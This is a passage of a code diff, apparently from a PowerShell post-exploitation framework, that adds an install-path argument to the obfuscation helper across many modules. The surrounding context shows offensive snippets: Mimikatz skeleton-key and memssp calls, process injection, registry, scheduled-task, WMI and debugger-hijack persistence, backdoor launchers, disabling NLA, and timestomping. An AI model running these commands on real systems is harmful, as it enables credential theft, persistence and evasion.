helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/enable_multi_rdp.py b/lib/modules/powershell/management/enable_multi_rdp.py index 1db6588..b3eb8d1 100644 --- a/lib/modules/powershell/management/enable_multi_rdp.py +++ b/lib/modules/powershell/management/enable_multi_rdp.py @@ -73,6 +73,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/enable_rdp.py b/lib/modules/powershell/management/enable_rdp.py index e7a27a5..4c45a8e 100644 --- a/lib/modules/powershell/management/enable_rdp.py +++ b/lib/modules/powershell/management/enable_rdp.py @@ -57,5 +57,5 @@ class Module: # command to disable NLA script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/get_domain_sid.py b/lib/modules/powershell/management/get_domain_sid.py index 1c10faa..61786bf 100644 --- a/lib/modules/powershell/management/get_domain_sid.py +++ b/lib/modules/powershell/management/get_domain_sid.py @@ -84,5 +84,5 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/honeyhash.py b/lib/modules/powershell/management/honeyhash.py index 575fd97..899b985 100644 --- a/lib/modules/powershell/management/honeyhash.py +++ b/lib/modules/powershell/management/honeyhash.py @@ -90,6 +90,6 @@ class Module: if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/invoke_script.py b/lib/modules/powershell/management/invoke_script.py index 1b0b4f4..f828e33 100644 --- a/lib/modules/powershell/management/invoke_script.py +++ b/lib/modules/powershell/management/invoke_script.py @@ -77,5 +77,5 @@ class Module: script += "%s" %(scriptCmd) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/lock.py b/lib/modules/powershell/management/lock.py index 9315a87..83b339d 100644 --- a/lib/modules/powershell/management/lock.py +++ b/lib/modules/powershell/management/lock.py @@ -87,5 +87,5 @@ Function Invoke-LockWorkStation { Invoke-LockWorkStation; "Workstation locked." """ if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/logoff.py b/lib/modules/powershell/management/logoff.py index 4508776..8eef8c3 100644 --- a/lib/modules/powershell/management/logoff.py +++ b/lib/modules/powershell/management/logoff.py @@ -62,5 +62,5 @@ class Module: else: script = "'Logging off current user.'; Start-Sleep -s 3; shutdown /l /f" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/mailraider/disable_security.py b/lib/modules/powershell/management/mailraider/disable_security.py index 7bf6639..ebb3d86 100644 --- a/lib/modules/powershell/management/mailraider/disable_security.py +++ b/lib/modules/powershell/management/mailraider/disable_security.py @@ -110,6 +110,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/get_emailitems.py b/lib/modules/powershell/management/mailraider/get_emailitems.py index d7229cf..8a9f219 100644 --- a/lib/modules/powershell/management/mailraider/get_emailitems.py +++ b/lib/modules/powershell/management/mailraider/get_emailitems.py @@ -87,6 +87,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/get_subfolders.py b/lib/modules/powershell/management/mailraider/get_subfolders.py index e61c68d..46856a1 100644 --- a/lib/modules/powershell/management/mailraider/get_subfolders.py +++ b/lib/modules/powershell/management/mailraider/get_subfolders.py @@ -87,6 +87,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/mail_search.py b/lib/modules/powershell/management/mailraider/mail_search.py index 9494cfd..f0c85fe 100644 --- a/lib/modules/powershell/management/mailraider/mail_search.py +++ b/lib/modules/powershell/management/mailraider/mail_search.py @@ -112,6 +112,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/search_gal.py b/lib/modules/powershell/management/mailraider/search_gal.py index db46b09..971e4e9 100644 --- a/lib/modules/powershell/management/mailraider/search_gal.py +++ b/lib/modules/powershell/management/mailraider/search_gal.py @@ -107,6 +107,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/send_mail.py b/lib/modules/powershell/management/mailraider/send_mail.py index d25094f..e5733ad 100644 --- a/lib/modules/powershell/management/mailraider/send_mail.py +++ b/lib/modules/powershell/management/mailraider/send_mail.py @@ -117,6 +117,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/mailraider/view_email.py b/lib/modules/powershell/management/mailraider/view_email.py index 3495c56..f162fda 100644 --- a/lib/modules/powershell/management/mailraider/view_email.py +++ b/lib/modules/powershell/management/mailraider/view_email.py @@ -92,6 +92,6 @@ class Module: scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/psinject.py b/lib/modules/powershell/management/psinject.py index 1c8c9da..cd22b64 100644 --- a/lib/modules/powershell/management/psinject.py +++ b/lib/modules/powershell/management/psinject.py @@ -133,6 +133,6 @@ class Module: else: scriptEnd += "Invoke-PSInject -ProcName %s -PoshCode %s" % (procName, launcherCode) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/reflective_inject.py b/lib/modules/powershell/management/reflective_inject.py index 1bb50a9..e5d19ea 100644 --- a/lib/modules/powershell/management/reflective_inject.py +++ b/lib/modules/powershell/management/reflective_inject.py @@ -146,7 +146,7 @@ class Module: UploadScript = self.mainMenu.stagers.generate_upload(dll, fullUploadPath) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += "\r\n" script += UploadScript diff --git a/lib/modules/powershell/management/restart.py b/lib/modules/powershell/management/restart.py index 867a650..dee7562 100644 --- a/lib/modules/powershell/management/restart.py +++ b/lib/modules/powershell/management/restart.py @@ -52,5 +52,5 @@ class Module: script = "'Restarting computer';Restart-Computer -Force" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/runas.py b/lib/modules/powershell/management/runas.py index c61dfb1..1978eb7 100644 --- a/lib/modules/powershell/management/runas.py +++ b/lib/modules/powershell/management/runas.py @@ -138,6 +138,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/sid_to_user.py b/lib/modules/powershell/management/sid_to_user.py index 20f81c3..9978ce0 100644 --- a/lib/modules/powershell/management/sid_to_user.py +++ b/lib/modules/powershell/management/sid_to_user.py @@ -57,5 +57,5 @@ class Module: script = "(New-Object System.Security.Principal.SecurityIdentifier(\"%s\")).Translate( [System.Security.Principal.NTAccount]).Value" %(self.options['SID']['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/spawn.py b/lib/modules/powershell/management/spawn.py index 80e29df..30bd569 100644 --- a/lib/modules/powershell/management/spawn.py +++ b/lib/modules/powershell/management/spawn.py @@ -100,5 +100,5 @@ class Module: code = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (parts[0], " ".join(parts[1:]), listenerName) if obfuscate: - code = helpers.obfuscate(psScript=code, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, psScript=code, obfuscationCommand=obfuscationCommand) return code diff --git a/lib/modules/powershell/management/spawnas.py b/lib/modules/powershell/management/spawnas.py index 43151eb..d54baa6 100644 --- a/lib/modules/powershell/management/spawnas.py +++ b/lib/modules/powershell/management/spawnas.py @@ -157,6 +157,6 @@ class Module: scriptEnd += "-Cmd \"$env:public\debug.bat\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/switch_listener.py b/lib/modules/powershell/management/switch_listener.py index 8d5b3da..e021401 100644 --- a/lib/modules/powershell/management/switch_listener.py +++ b/lib/modules/powershell/management/switch_listener.py @@ -71,5 +71,5 @@ class Module: # signal the existing listener that we're switching listeners, and the new comms code commsCode = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (listenerName, commsCode) if obfuscate: - commsCode = helpers.obfuscate(psScript=commsCode, obfuscationCommand=obfuscationCommand) + commsCode = helpers.obfuscate(self.mainMenu.installPath, psScript=commsCode, obfuscationCommand=obfuscationCommand) return commsCode diff --git a/lib/modules/powershell/management/timestomp.py b/lib/modules/powershell/management/timestomp.py index bb20f46..69a5b91 100644 --- a/lib/modules/powershell/management/timestomp.py +++ b/lib/modules/powershell/management/timestomp.py @@ -108,6 +108,6 @@ class Module: scriptEnd += "| Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/user_to_sid.py b/lib/modules/powershell/management/user_to_sid.py index 861b7bd..b6bbddd 100644 --- a/lib/modules/powershell/management/user_to_sid.py +++ b/lib/modules/powershell/management/user_to_sid.py @@ -63,5 +63,5 @@ class Module: script = "(New-Object System.Security.Principal.NTAccount(\"%s\",\"%s\")).Translate([System.Security.Principal.SecurityIdentifier]).Value" %(self.options['Domain']['Value'], self.options['User']['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/vnc.py b/lib/modules/powershell/management/vnc.py index e3ef899..e8f4836 100644 --- a/lib/modules/powershell/management/vnc.py +++ b/lib/modules/powershell/management/vnc.py @@ -102,6 +102,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/management/wdigest_downgrade.py b/lib/modules/powershell/management/wdigest_downgrade.py index c8edfda..ecec54f 100644 --- a/lib/modules/powershell/management/wdigest_downgrade.py +++ b/lib/modules/powershell/management/wdigest_downgrade.py @@ -151,5 +151,5 @@ function Invoke-WdigestDowngrade { else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/zipfolder.py b/lib/modules/powershell/management/zipfolder.py index 8771365..8dc5ca5 100644 --- a/lib/modules/powershell/management/zipfolder.py +++ b/lib/modules/powershell/management/zipfolder.py @@ -93,5 +93,5 @@ Invoke-ZipFolder""" if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/registry.py b/lib/modules/powershell/persistence/elevated/registry.py index 8fd7f1d..2ab37ac 100644 --- a/lib/modules/powershell/persistence/elevated/registry.py +++ b/lib/modules/powershell/persistence/elevated/registry.py @@ -205,5 +205,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/schtasks.py b/lib/modules/powershell/persistence/elevated/schtasks.py index 3f130c0..fbad434 100644 --- a/lib/modules/powershell/persistence/elevated/schtasks.py +++ b/lib/modules/powershell/persistence/elevated/schtasks.py @@ -161,7 +161,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -241,5 +241,5 @@ class Module: statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "." script += "'Schtasks persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/elevated/wmi.py b/lib/modules/powershell/persistence/elevated/wmi.py index 50e82a9..9b68e0c 100644 --- a/lib/modules/powershell/persistence/elevated/wmi.py +++ b/lib/modules/powershell/persistence/elevated/wmi.py @@ -124,7 +124,7 @@ class Module: script += "Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match '"+subName+"'} | Remove-WmiObject;" script += "'WMI persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -199,5 +199,5 @@ class Module: script += "'WMI persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/add_netuser.py b/lib/modules/powershell/persistence/misc/add_netuser.py index 0d41676..44fc980 100644 --- a/lib/modules/powershell/persistence/misc/add_netuser.py +++ b/lib/modules/powershell/persistence/misc/add_netuser.py @@ -107,5 +107,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/add_sid_history.py b/lib/modules/powershell/persistence/misc/add_sid_history.py index 914b281..9f148f2 100644 --- a/lib/modules/powershell/persistence/misc/add_sid_history.py +++ b/lib/modules/powershell/persistence/misc/add_sid_history.py @@ -90,6 +90,6 @@ class Module: # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/misc/debugger.py b/lib/modules/powershell/persistence/misc/debugger.py index 19be5a7..f9f8c6f 100644 --- a/lib/modules/powershell/persistence/misc/debugger.py +++ b/lib/modules/powershell/persistence/misc/debugger.py @@ -94,7 +94,7 @@ class Module: # the registry command to disable the debugger for Utilman.exe script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s';'%s debugger removed.'" %(targetBinary, targetBinary) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script @@ -133,5 +133,5 @@ class Module: # the registry command to set the debugger for the specified binary to be the binary path specified script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"+targetBinary+"' -Name Debugger -Value '"+triggerBinary+"';'"+targetBinary+" debugger set to "+triggerBinary+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py index d06efe4..1ef774a 100644 --- a/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py +++ b/lib/modules/powershell/persistence/misc/disable_machine_acct_change.py @@ -61,10 +61,10 @@ class Module: if cleanup.lower() == 'true': script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 0; 'Machine account password change re-enabled.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script script = "$null=Set-ItemProperty -Force -Path HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters -Name DisablePasswordChange -Value 1; 'Machine account password change disabled.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/get_ssps.py b/lib/modules/powershell/persistence/misc/get_ssps.py index 88a9c2c..5206dab 100644 --- a/lib/modules/powershell/persistence/misc/get_ssps.py +++ b/lib/modules/powershell/persistence/misc/get_ssps.py @@ -191,5 +191,5 @@ Get-SecurityPackages if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/install_ssp.py b/lib/modules/powershell/persistence/misc/install_ssp.py index d8f7df8..8e717d6 100644 --- a/lib/modules/powershell/persistence/misc/install_ssp.py +++ b/lib/modules/powershell/persistence/misc/install_ssp.py @@ -264,5 +264,5 @@ into lsass, the dll must export SpLsaModeInitialize. if values['Value'] and values['Value'] != '': script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/misc/memssp.py b/lib/modules/powershell/persistence/misc/memssp.py index 42d4e3a..2e6cabc 100644 --- a/lib/modules/powershell/persistence/misc/memssp.py +++ b/lib/modules/powershell/persistence/misc/memssp.py @@ -79,6 +79,6 @@ class Module: scriptEnd += '"memssp installed, check C:\Windows\System32\mimisla.log for logon events."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/misc/skeleton_key.py b/lib/modules/powershell/persistence/misc/skeleton_key.py index 36c3a52..58bc424 100644 --- a/lib/modules/powershell/persistence/misc/skeleton_key.py +++ b/lib/modules/powershell/persistence/misc/skeleton_key.py @@ -79,6 +79,6 @@ class Module: scriptEnd += '"Skeleton key implanted. Use password \'mimikatz\' for access."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/powerbreach/deaduser.py b/lib/modules/powershell/persistence/powerbreach/deaduser.py index 7c75df6..1ecb1b3 100644 --- a/lib/modules/powershell/persistence/powerbreach/deaduser.py +++ b/lib/modules/powershell/persistence/powerbreach/deaduser.py @@ -185,7 +185,7 @@ Invoke-DeadUserBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -196,6 +196,6 @@ Invoke-DeadUserBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-DeadUserBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/powerbreach/eventlog.py b/lib/modules/powershell/persistence/powerbreach/eventlog.py index eab55ee..faa4236 100644 --- a/lib/modules/powershell/persistence/powerbreach/eventlog.py +++ b/lib/modules/powershell/persistence/powerbreach/eventlog.py @@ -160,7 +160,7 @@ Invoke-EventLogBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -171,7 +171,7 @@ Invoke-EventLogBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) print scriptLauncher diff --git a/lib/modules/powershell/persistence/powerbreach/resolver.py b/lib/modules/powershell/persistence/powerbreach/resolver.py index 554a3cc..c26a99a 100644 --- a/lib/modules/powershell/persistence/powerbreach/resolver.py +++ b/lib/modules/powershell/persistence/powerbreach/resolver.py @@ -172,7 +172,7 @@ Invoke-ResolverBackdoor""" return "" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) # transform the backdoor into something launched by powershell.exe # so it survives the agent exiting modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc " @@ -183,5 +183,5 @@ Invoke-ResolverBackdoor""" # set up the start-process command so no new windows appears scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:])) if obfuscate: - scriptLauncher = helpers.obfuscate(psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) + scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand) return scriptLauncher diff --git a/lib/modules/powershell/persistence/userland/backdoor_lnk.py b/lib/modules/powershell/persistence/userland/backdoor_lnk.py index 87e8009..822f03c 100644 --- a/lib/modules/powershell/persistence/userland/backdoor_lnk.py +++ b/lib/modules/powershell/persistence/userland/backdoor_lnk.py @@ -180,6 +180,6 @@ class Module: scriptEnd += " -EncScript '%s'" %(encScript) scriptEnd += "; \"Invoke-BackdoorLNK run on path '%s' with stager for listener '%s'\"" %(lnkPath,listenerName) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/persistence/userland/registry.py b/lib/modules/powershell/persistence/userland/registry.py index 651a008..57042d2 100644 --- a/lib/modules/powershell/persistence/userland/registry.py +++ b/lib/modules/powershell/persistence/userland/registry.py @@ -149,7 +149,7 @@ class Module: script += "Remove-ItemProperty -Force -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";" script += "'Registry Persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script if extFile != '': @@ -236,5 +236,5 @@ class Module: script += "'Registry persistence established "+statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/persistence/userland/schtasks.py b/lib/modules/powershell/persistence/userland/schtasks.py index 2abed9e..e4adc53 100644 --- a/lib/modules/powershell/persistence/userland/schtasks.py +++ b/lib/modules/powershell/persistence/userland/schtasks.py @@ -155,7 +155,7 @@ class Module: script += "schtasks /Delete /F /TN "+taskName+";" script += "'Schtasks persistence removed.'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, 